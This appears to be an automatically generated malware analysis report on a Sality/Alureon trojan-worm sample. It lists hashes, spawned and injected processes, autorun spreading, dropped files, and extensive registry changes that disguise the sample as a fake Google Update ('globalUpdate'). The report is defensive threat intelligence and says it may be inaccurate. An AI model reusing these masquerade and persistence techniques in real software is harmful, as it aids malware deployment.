Win32.Sality.3 (B) (Emsisoft), Win32.Sality.3 (AdAware), Trojan.Win32.Alureon.FD, Virus.Win32.Sality.FD, Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, Virus, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4349e06c6d8b7677af3099bc0ee5d727
SHA1: 15b8ebdfa17bcc42081ae6dacc15669d27dd0388
SHA256: e385622cb5ed5e8cae557e320849d0595c325db264c713fc5eafa70aaac1eb6c
SSDeep: 196608:foymYvquDTSnlxpf8FBXFf5ihM36YfYbYDGgbTfoe2:fo5YvtSnlXf8FZ4YDVbTq
Size: 8041352 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-04 15:55:02
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Trojan creates the following process(es):
GoogleUpdate.exe:2460
GoogleUpdate.exe:756
GoogleUpdate.exe:2652
GoogleUpdate.exe:2296
GoogleUpdate.exe:1288
GoogleUpdate.exe:2364
GoogleUpdate.exe:2356
772406a5-70fe-462f-841c-e18bdccbdc78-3.exe:1540
Iufkopcpdfjpcg.exe:424
MPlayerplus_01-bg.exe:2776
772406a5-70fe-462f-841c-e18bdccbdc78-4.exe:2112
%original file name%.exe:688
regsvr32.exe:2736
dwwin.exe:3088
MPlayerplus_01-codedownloader.exe:2344
MPlayerplus_01-codedownloader.exe:2224
772406a5-70fe-462f-841c-e18bdccbdc78-2.exe:2848
The Trojan injects its code into the following process(es):
3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe:852
Explorer.EXE:1684
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process GoogleUpdate.exe:2460 makes changes in the file system.
The Trojan deletes the following file(s):
%Program Files%\globalUpdate\Update\Install (0 bytes)
The process GoogleUpdate.exe:756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CabB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (0 bytes)
The process Iufkopcpdfjpcg.exe:424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
The process %original file name%.exe:688 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00157D19_Rar\%original file name%.exe (61184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (265148 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Zvbbyym.tmp (248938 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Iufkopcpdfjpcg.exe (983586 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\WrapperUtils.dll (2392 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Zvbbyym.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Iufkopcpdfjpcg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\WrapperUtils.dll (0 bytes)
The process MPlayerplus_01-codedownloader.exe:2344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
Registry activity
The process GoogleUpdate.exe:2460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 44 FC 46 17 38 E3 97 36 D2 61 4A A3 FA D2 C6"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{B13CB685-2858-4509-BB2E-34E3545B73F9}]
"pv" = "1.3.25.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"
The process GoogleUpdate.exe:756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description" = "globalUpdate Update"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\ProgID]
"(Default)" = "globalUpdate.OneClickCtrl.10"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"
[HKCR\globalUpdate.Update3WebControl.4\CLSID]
"(Default)" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"ProductName" = "globalUpdate Update"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"(Default)" = "globalUpdate Update Plugin"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"Name" = "globalUpdate Update"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Version" = "4"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Version" = "10"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\globalUpdate\Update]
"GoogleUpdate.exe" = "globalUpdate Update"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"ProductName" = "globalUpdate Update"
[HKCR\globalUpdate.Update3WebControl.4]
"(Default)" = "globalUpdate Update Plugin"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppName" = "GoogleUpdate.exe"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"vendor" = "globalUpdate"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\MIME\Database\Content Type\application/x-vnd.google.update3webcontrol.4]
"CLSID" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppName" = "GoogleUpdateBroker.exe"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description" = "globalUpdate Update"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"InstallTime" = "1413862435"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"DisableExceptionChainValidation" = "0"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"brand" = "GGLS"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"(Default)" = "globalUpdate Update Plugin"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"vendor" = "globalUpdate"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 92 F4 66 72 14 7F E1 AA B2 C8 FC 8E 30 19 46"
[HKCR\globalUpdate.OneClickCtrl.10\CLSID]
"(Default)" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"Path" = "%Program Files%\globalUpdate\Update\GoogleUpdate.exe"
"Version" = "1.3.25.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppPath" = "%Program Files%\globalUpdate\Update\1.3.25.0"
[HKCR\MIME\Database\Content Type\application/x-vnd.google.oneclickctrl.10]
"CLSID" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppPath" = "%Program Files%\globalUpdate\Update"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\ProgID]
"(Default)" = "globalUpdate.Update3WebControl.4"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
"ThreadingModel" = "Apartment"
[HKCR\globalUpdate.OneClickCtrl.10]
"(Default)" = "globalUpdate Update Plugin"
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update]
"mi"
"eulaaccepted"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"LastChecked"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableSince"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"ui"
"uid"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableCount"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
The process GoogleUpdate.exe:2652 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 5F DE 54 9B E3 20 26 3E 7B 60 E6 D1 93 0B C1"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}]
"(Default)" = "CoCreateAsync"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}]
"(Default)" = "IApp"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}]
"(Default)" = "IJobObserver"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\globalUpdateUpdate.CoCreateAsync.1.0]
"(Default)" = "CoCreateAsync"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"Enabled" = "1"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}]
"(Default)" = "IGoogleUpdate3Web"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}]
"(Default)" = "ICredentialDialog"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.Update3WebMachine\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\NumMethods]
"(Default)" = "13"
[HKCR\globalUpdateUpdate.CredentialDialogMachine\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\ProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"
[HKCR\globalUpdateUpdate.Update3WebMachine.1.0\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\NumMethods]
"(Default)" = "40"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.Update3WebMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}]
"(Default)" = "ICoCreateAsyncStatus"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}]
"(Default)" = "IProcessLauncher"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.CoreMachineClass]
"(Default)" = "Google Update Core Class"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\NumMethods]
"(Default)" = "24"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\NumMethods]
"(Default)" = "4"
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\NumMethods]
"(Default)" = "9"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"
[HKCR\globalUpdateUpdate.ProcessLauncher\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"Policy" = "3"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.ProcessLauncher]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\NumMethods]
"(Default)" = "10"
[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}]
"(Default)" = "IRegistrationUpdateHook"
[HKCR\globalUpdateUpdate.CoreMachineClass\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\NumMethods]
"(Default)" = "10"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}]
"(Default)" = "IGoogleUpdate3WebSecurity"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}]
"(Default)" = "IGoogleUpdateCore"
[HKCR\globalUpdateUpdate.ProcessLauncher.1.0]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.CoCreateAsync\CurVer]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\NumMethods]
"(Default)" = "10"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}]
"(Default)" = "IAppVersionWeb"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdate.OneClickProcessLauncherMachine]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\NumMethods]
"(Default)" = "24"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 48 80 90 16 B1 9E B5 7A 8B FF 4E 4F 2C 34 3E"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}]
"(Default)" = "IGoogleUpdate3"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\ProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"
[HKCR\globalUpdateUpdate.CredentialDialogMachine\CurVer]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"
[HKCR\globalUpdate.OneClickProcessLauncherMachine\CurVer]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\NumMethods]
"(Default)" = "8"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass"
[HKCR\globalUpdateUpdate.CoreMachineClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\ProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\NumMethods]
"(Default)" = "8"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}]
"(Default)" = "ICurrentState"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"
[HKCR\globalUpdateUpdate.ProcessLauncher.1.0\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\NumMethods]
"(Default)" = "14"
